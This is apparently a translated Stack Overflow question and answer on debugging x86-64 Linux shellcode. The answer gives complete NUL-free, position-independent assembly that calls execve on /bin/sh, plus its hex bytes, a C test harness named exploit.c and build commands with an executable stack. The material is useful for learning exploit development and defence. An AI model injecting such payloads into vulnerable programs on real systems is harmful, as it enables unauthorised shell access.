【问题标题】:Shellcode: Illegal instructionShellcode:非法指令
【发布时间】:2021-02-01 13:19:09
【问题描述】:

我是 shellcode 开发的新手,我不明白为什么生成的 shellcode 不能按预期工作。

汇编代码:

基于an answer我之前的问题。

.section .data
cmd:    .string "/bin/sh"               /* command string */
hand:   .string "-c"                    /* command arguments string */
args:   .string "ls -al"                /* arguments string */
argv:   .quad cmd                       /* array of command, command arguments and arguments */
        .quad hand
        .quad args
        .quad 0

.section .text
.globl _start
_start:
        movq    $59,            %rax    /* call execve system call */
        leaq    cmd(%rip),      %rdi    /* save command to rdi */
        leaq    argv(%rip),     %rsi    /* save args to rsi */
        movq    $0,             %rdx    /* save NULL to rdx */

        syscall                         /* make system call */

C 测试代码:

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = "\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\xf2\x0f\x00\x00\x48\x8d\x35\xfd\x0f\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05";

int main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}

输出:

Illegal instruction

详情: Kali Linux GNU/Linux i386 x86_64

【问题讨论】:

  • 您的代码没有数据就无法工作。系统调用很可能失败并返回错误代码,然后继续执行到包含垃圾的内存中,这些垃圾恰好被解码为非法指令。

标签: assembly gcc x86-64 gnu-assembler shellcode


【解决方案1】:

您的代码的问题是您生成的 shell 字符串不包含任何数据。并且数据包含绝对指针,因此与位置无关,因此如果您将其移至 .text 并包含它,则将无法工作。一旦在另一个程序中运行,就像您在 C 代码中所做的那样,该程序将尝试查找不存在的数据以及不适用于您在其中运行的可利用程序的固定内存位置的数据.

我认为您可能有另一个问题导致非法指令。您没有展示如何构建您的 C 程序,但我想知道它是否是 32 位的,而您的 shellcode 是否是 64 位的。我开始认为您的 C 程序可能已编译为 32 位程序,而 Illegal instruction 可能是因为您无法可靠地运行 64 位代码( shell 代码)在 32 位程序中。例如,SYSCALL 指令是非 AMD CPU 上 32 位程序中的无效操作码。在没有更多关于如何编译/组装/链接 shell 代码和 C 程序的细节的情况下,这只是一个猜测。


您必须生成与位置无关的代码 (PIC),以便它在加载到堆栈后可以在任何地方运行。您的数据必须放在带有代码的段内。代码还必须避免生成 NUL 字符 (0x00),因为如果将其作为用户输入提供给实际可利用程序,则会过早终止字符串。

可用于此类目的的代码版本可能如下所示:

shellcode.s:

# This shell code is designed to avoid any NUL(0x00) byte characters being generated
# and is coded to be position independent.

.section .text
.globl _start
_start:
    jmp overdata                 # Mix code and DATA in same segment

# Generate all the strings without a NUL(0) byte. We will replace the 0xff
# with 0x00 in the code
name:.ascii "/bin/sh"            # Program to run
name_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg1:.ascii "-c"                 # Program argument
arg1_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg2:.ascii "ls"                 # Program Argument
arg2_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code

overdata:
    xor  %eax, %eax              # RAX = 0

    # All references to the data before our code will use a negative offset from RIP
    # and use a 4 byte displacement. This avoids producing unwanted NUL(0) characters
    # in the code. We use RIP relative addressing so the code will be position
    # independent once loaded in memory.

    # Zero terminate each of the strings
    mov  %al, arg2_nul(%rip)     
    mov  %al, arg1_nul(%rip) 
    mov  %al, name_nul(%rip)

    lea  name(%rip), %rdi        # RDI = pointer to program name string

    push %rax                    # NULL terminate the program argument array
    leaq arg2(%rip), %rsi
    push %rsi                    # Push address of the 3rd program argument on stack
    lea  arg1(%rip), %rsi
    push %rsi                    # Push address of the 2nd program argument on stack
    push %rdi                    # Push address of the program name on stack as 1st arg
    mov  %rsp, %rsi              # RSI = Pointer to the program argument array

    mov  %rax, %rdx              # RDX = 0 = NULL envp parameter

    mov $59, %al                 # RAX = execve system call number

    syscall

您可以使用以下命令生成 C 样式字符串:

as --64 shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
objcopy -j.text -O binary shellcode shellcode.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin

上面的hexdump 命令会输出:

\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\ xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\ xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05

您会注意到与您的代码不同,没有\x00 字符。您可以直接在 C 程序中使用此字符串,例如:

exploit.c:

int main(void)
{
    char shellcode[]="\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05";

    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}

这必须编译并与可执行堆栈链接:

gcc -zexecstack exploit.c -o exploit

strace ./exploit 会生成类似于以下内容的EXECVE 系统调用:

execve("/bin/sh", ["/bin/sh", "-c", "ls"], NULL) = 0


注意:我会亲自在堆栈上以编程方式构建字符串,类似于我写的另一个 Stackoverflow answer 中的代码。

【讨论】:

  • 您说您的.s“不能直接运行”,但如果您与--omagic 链接以使.text 可写,则可以。经过测试并与gcc -static -nostdlib -Wl,--omagic foo.s &amp;&amp; strace ./a.out 一起使用。 (或者将您的代码放入.data 并与-zexecstack 链接,如果您不使用.note.gnu_stack 指令,则默认情况下实际上是打开的。)
  • 不必要的代码大小优化,以防万一有人感兴趣:如果您早先使用lea name(%rip), %rdi,您还可以为每条指令节省3个字节,然后使用mov %al, arg2_nul-name(%rdi)和lea arg2-name(%rdi), %rsi等寻址模式。 (RDI+disp8 而不是 RIP+rel32)。设置 envp=RDX=0 可以更紧凑地使用来自零 RAX 的 1 字节 cdq 或使用 xor %edx,%edx。或者如果你愿意,可以使用mov %eax, %edx。或者首先将 RDX 设为零而不是 RAX,并设置 RAX=59 为 3 字节 lea 59(%rdx), %eax
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 2019-01-20
  • 2020-12-20
  • 2013-04-05
  • 2021-06-14
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多